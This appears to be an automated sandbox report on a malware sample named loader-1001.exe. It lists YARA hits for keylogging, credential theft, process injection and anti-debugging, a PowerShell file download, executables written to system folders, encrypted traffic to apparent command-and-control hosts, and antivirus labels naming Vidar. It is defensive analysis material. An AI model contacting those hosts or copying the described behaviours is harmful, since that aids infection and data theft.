Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 10, 2024, 10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 10, 2024, 10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (9 events)

Time & API	Arguments	Status	Return
send June 10, 2024, 10 a.m.	buffer: \|ffP&j °ýnÙd-~Gëþ4F¿xinÆ/5 ÀÀÀ À 28;ÿ" d22hce23hy1ej9.cloudfront.net socket: 1424 sent: 133	1	133
send June 10, 2024, 10 a.m.	buffer: FBAä³ùû'enÔÿ"!¨ÀËtÄôdÓ0ê§@UêpçåXg k!¦#IZÃHÙkL'È0*ð×Î[nÊÃI³ßÓY¹S¢ y.Çß©ý¯4¯ÖØoVÀ%K`Ýi socket: 1424 sent: 134	1	134
send June 10, 2024, 10 a.m.	buffer: f4gmÏjuÒýQÂ§*¡±/#'N¯½µ+#U ¢çÚ%Ýñ¹o&cÑõcV»¶¢Êz ÕZüökCÄrð¯MþZK³P#8½òì¿otÊIÐf@TÎ®I¸Ònèúm9«$? socket: 1424 sent: 133	1	133
send June 10, 2024, 10 a.m.	buffer: \|ffP'n¿ßô¹ZÔ¿YO BþdÐËè,}Ü¼/5 ÀÀÀ À 28;ÿ" d22hce23hy1ej9.cloudfront.net socket: 1436 sent: 133	1	133
send June 10, 2024, 10 a.m.	buffer: FBA[Öõ·éÛVvÍlçwg¥ M³áRç,W^©uçG#Î8ÔëXl¥ÏéwZkIYÆ,%µv´àOì v\0îÿZÎ_ûFóãaO2 ¡Ø?~Iw'9ÚsÆÆ:OûLß^îr8'}l socket: 1436 sent: 134	1	134
send June 10, 2024, 10 a.m.	buffer: 4±^o7ªQÚj:;7Á*ÀjW¸ö¨ðöðÆ=Î\|,¤ÍV¾«mJ^Ða«WÀtgìx¾n)UxL¢¿õ^3Ú¦õççÎ@N~Dl;úøî½%¸Ñì¤-PÀíÜ¬ÅþÞsÑ(\|'~59¢ìQI,j1Õ)© socket: 1436 sent: 133	1	133
send June 10, 2024, 10 a.m.	buffer: tpffP(+þ¯SpÕß·Í¥.}'ñAÍ$¿iba/5 ÀÀÀ À 28/ÿcdn-edge-node.com socket: 1944 sent: 121	1	121
send June 10, 2024, 10 a.m.	buffer: FBA©õtHËOÌ¤ÍØ¥3îâ6åL åv\hÊ¼afÍc;.ë;ð¥æ\1º"ü[hÒb0WÙÛ´£ý?5êÃ«p*Ïé´²eIªÃj-'LtÉü socket: 1944 sent: 134	1	134
send June 10, 2024, 10 a.m.	buffer: pðçEjÎ\|/jFØË}l @ºØª¢³ã6Ú[ÓÆË/!ÖQÜ¶±2ï¹ÆÃ¬ÈÚgr¥ÅÔÖp1q©È]ñ Q6ÐqÜ)yÁÈ&"s,ÑO5NEà=jëÙÃÔ9í²; socket: 1944 sent: 117	1	117

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2692 resumed a thread in remote process 2984
NtResumeThread June 10, 2024, 10 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2984	1	0	0

Creates a suspicious Powershell process (2 events)

value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\i0.exe

File has been identified by 31 AntiVirus engines on VirusTotal as malicious (31 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Agent.Y!c
Skyhigh	BehavesLike.Win32.Dropper.ph
Cylance	Unsafe
Sangfor	Trojan.Win32.Agent.V3ip
Symantec	Trojan.Gen.MBT
Elastic	malicious (high confidence)
APEX	Malicious
McAfee	Artemis!58CA6D5068FA
Avast	NSIS:PWSX-gen [Trj]
Kaspersky	HEUR:Trojan.Win32.Agent.gen
TrendMicro	TrojanSpy.Win32.VIDAR.YXEEBZ
McAfeeD	ti!ABC83F0B74C5
Trapmine	malicious.moderate.ml.score
Sophos	Mal/Generic-S
Webroot	W32.Trojan.Gen
Antiy-AVL	Trojan/Win32.Agent.gen
Kingsoft	Win32.Trojan.Agent.gen
Gridinsoft	Trojan.Win32.Agent.sa
Microsoft	Trojan:Win32/Phonzy.C!ml
ZoneAlarm	HEUR:Trojan.Win32.Agent.gen
Varist	W32/ABRisk.CKWD-2776
DeepInstinct	MALICIOUS
VBA32	suspected of Trojan.Downloader.gen
Malwarebytes	Trojan.Downloader.NSIS
Panda	Trj/Downloader.RP
TrendMicro-HouseCall	TrojanSpy.Win32.VIDAR.YXEEBZ
SentinelOne	Static AI - Suspicious PE
Fortinet	W32/PossibleThreat
AVG	NSIS:PWSX-gen [Trj]
Paloalto	generic.ml

loader-1001.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All